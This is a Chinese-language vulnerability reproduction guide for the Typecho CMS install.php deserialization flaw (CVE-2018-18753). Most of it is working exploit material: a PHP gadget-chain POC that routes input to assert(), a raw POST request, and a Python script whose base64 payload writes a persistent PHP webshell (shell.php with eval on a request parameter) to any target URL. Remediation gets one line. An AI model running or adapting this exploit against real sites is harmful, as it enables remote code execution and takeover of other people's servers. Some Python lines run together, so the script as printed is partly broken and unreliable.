Typecho CMS 反序列化漏洞(CVE-2018-18753)复现

简介

Typecho原本是一款博客系统,其框架体系有别于市面上一般意义MVC框架,主体代码以自创的Widget为基类,整体非常简洁

 

漏洞概述

typecho 是博客CMS，前台install.php 文件存在反序列化漏洞，通过构造的反序列化字符串注入可以执行任意PHP 代码。

 

影响版本

typecho1.0(14.10.10)

 

环境搭建

下载typecho14.10.10

https://github.com/typecho/typecho/tags

按照顺序默认安装即可

安装完毕

 

漏洞复现

创建poc.php文件

<?php
class Typecho_Feed 
{ 
	const RSS1 = 'RSS 1.0'; 
	const RSS2 = 'RSS 2.0'; 
	const ATOM1 = 'ATOM 1.0'; 
	const DATE_RFC822 = 'r'; 
	const DATE_W3CDTF = 'c'; 
	const EOL = "\n"; 
	private $_type; 
	private $_items; 
	
	public function __construct(){
    $this->_type = $this::RSS2; 
    $this->_items[0] = array( 
    	'title' => '1', 
    	'link' => '1', 
    	'date' => 1508895132, 
    	'category' => array(new Typecho_Request()), 
    	'author' => new Typecho_Request(), 
    	); 
  	} 
} 
class Typecho_Request 
{ 
	private $_params = array(); 
	private $_filter = array(); 
	public function __construct(){ 
	$this->_params['screenName'] = 'phpinfo()';    //替换phpinfo()这里进行深度利用
	$this->_filter[0] = 'assert'; 
	} 
} 

$exp = array( 
	'adapter' => new Typecho_Feed(), 
	'prefix' => 'typecho_' 
); 

echo base64_encode(serialize($exp));
?>

执行命令获取poc

发送数据包

POST /build/install.php?finish= HTTP/1.1
Host: 192.168.1.102
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 772
Origin: http://192.168.1.102
Connection: close
Referer: http://192.168.1.102/build/
Upgrade-Insecure-Requests: 1

__typecho_config=[payload]

创建poc.py文件

import requests 
import sys 
url = sys.argv[1] path = "/install.php?finish=" print(url) 
payload = "YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YTo1OntzOjU6InRpdGxlIjtzOjE6IjEiO3M6NDoibGluayI7czoxOiIxIjtzOjQ6ImRhdGUiO2k6MTUwODg5NTEzMjtzOjg6ImNhdGVnb3J5IjthOjE6e2k6MDtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjU4OiJmcHV0cyhmb3Blbignc2hlbGwucGhwJywndycpLCc8Pz1AZXZhbCgkX1JFUVVFU1RbNzc3XSk/PicpIjt9czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfZmlsdGVyIjthOjE6e2k6MDtzOjY6ImFzc2VydCI7fX19czo2OiJhdXRob3IiO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO3M6NTg6ImZwdXRzKGZvcGVuKCdzaGVsbC5waHAnLCd3JyksJzw/PUBldmFsKCRfUkVRVUVTVFs3NzddKT8+JykiO31zOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9maWx0ZXIiO2E6MTp7aTowO3M6NjoiYXNzZXJ0Ijt9fX19fXM6NjoicHJlZml4IjtzOjg6InR5cGVjaG9fIjt9" 
postData = {"__typecho_config":payload} 
header ={ 
	"Referer":url, 
	"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0"} 
	
res = requests.get(url+path) 
if res.status_code == 200: 
	print("[+] install.php exist!") 
else: 
	print("[-] install.php not exist") 
	sys.exit() 
	
res = requests.post(url = url+path,data = postData,headers = header) 
res = requests.get(url+"shell.php") 
if res.status_code == 200: 
	print("[+] Shell.php write success!") 
	print("Shell path :",url+"shell.php") 
else: 
	print("[-] GetShell Error!")

简单的python利用

 

修复建议

升级到安全版本